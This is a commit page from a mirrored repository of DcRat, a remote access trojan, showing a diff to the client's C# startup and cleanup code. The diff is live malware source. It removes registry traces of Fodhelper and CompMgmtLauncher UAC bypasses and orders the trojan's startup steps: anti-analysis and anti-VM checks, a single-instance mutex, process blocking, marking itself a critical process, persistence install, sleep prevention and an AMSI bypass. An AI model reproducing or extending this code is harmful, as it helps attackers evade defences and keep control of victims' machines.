qwqdanchun
/
DcRat
mirror of https://github.com/qwqdanchun/DcRat.git
1
0
Fork 0
Code Issues Projects Releases Wiki Activity

fix a little bug

This commit is contained in:
qwqdanchun 2021-03-27 13:49:53 +08:00
parent 26cefbac61
commit ec665ee122
2 changed files with 28 additions and 16 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

35
Client/Helper/Methods.cs
View File

@ -103,20 +103,31 @@ namespace Client.Helper
public static void ClearSetting() public static void ClearSetting()
{ {
try
//Silent Cleanup
RegistryKey key;
key = Microsoft.Win32.Registry.CurrentUser.CreateSubKey("Environment");
if (key.GetValue("windir") !=null)
{ {
key.DeleteValue("windir"); //Silent Cleanup
RegistryKey key;
key = Microsoft.Win32.Registry.CurrentUser.CreateSubKey("Environment");
if (key.GetValue("windir") != null)
{
key.DeleteValue("windir");
}
key.Close();
} }
catch { }
key.Close(); try
//CompMgmtLauncher {
Registry.CurrentUser.OpenSubKey("Software", true).OpenSubKey("Classes", true).DeleteSubKeyTree("mscfile"); //CompMgmtLauncher
//Fodhelper Registry.CurrentUser.OpenSubKey("Software", true).OpenSubKey("Classes", true).DeleteSubKeyTree("mscfile");
Registry.CurrentUser.OpenSubKey("Software", true).OpenSubKey("Classes", true).DeleteSubKeyTree("ms-settings"); }
catch { }
try
{
//Fodhelper
Registry.CurrentUser.OpenSubKey("Software", true).OpenSubKey("Classes", true).DeleteSubKeyTree("ms-settings");
}
catch { }
} }
} }
} }

9
Client/Program.cs
View File

@ -19,17 +19,18 @@ namespace Client
try try
{ {
if (Convert.ToBoolean(Settings.Anti_Process)) //run AntiProcess
AntiProcess.StartBlock();
if (Convert.ToBoolean(Settings.An_ti)) //run anti-virtual environment if (Convert.ToBoolean(Settings.An_ti)) //run anti-virtual environment
Anti_Analysis.RunAntiAnalysis(); Anti_Analysis.RunAntiAnalysis();
if (!MutexControl.CreateMutex()) //if current payload is a duplicate
Environment.Exit(0);
if (Convert.ToBoolean(Settings.Anti_Process)) //run AntiProcess
AntiProcess.StartBlock();
if (Convert.ToBoolean(Settings.BS_OD) && Methods.IsAdmin()) //active critical process if (Convert.ToBoolean(Settings.BS_OD) && Methods.IsAdmin()) //active critical process
ProcessCritical.Set(); ProcessCritical.Set();
if (Convert.ToBoolean(Settings.In_stall)) //drop payload [persistence] if (Convert.ToBoolean(Settings.In_stall)) //drop payload [persistence]
NormalStartup.Install(); NormalStartup.Install();
Methods.PreventSleep(); //prevent pc to idle\sleep Methods.PreventSleep(); //prevent pc to idle\sleep
if (!MutexControl.CreateMutex()) //if current payload is a duplicate
Environment.Exit(0);
if (Methods.IsAdmin()) if (Methods.IsAdmin())
Methods.ClearSetting(); Methods.ClearSetting();
Amsi.Bypass(); Amsi.Bypass();